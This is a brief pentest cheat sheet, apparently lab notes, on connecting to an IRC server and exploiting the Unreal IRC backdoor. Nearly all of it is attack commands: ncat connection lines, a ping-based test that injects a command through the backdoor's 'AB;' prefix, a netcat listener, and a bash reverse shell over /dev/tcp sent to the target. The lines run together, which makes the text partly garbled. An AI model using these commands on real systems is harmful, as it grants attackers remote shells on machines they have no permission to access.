IRC
Authenticate
ncat <ip> <port>PASS <anyPassword>
NICK <anyNickname>
USER <anyNickname> <anyServerName> AndComment :<anyComment>Backdoor in Unreal IRC
tcpdump -i tun0 icmpecho "AB; ping -c 1 <own-ip> | nc <target-ip> <port>Exploit it
ncat -lnvp <port>
echo "AB; bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'" | ncat <target-ip> <port>Last updated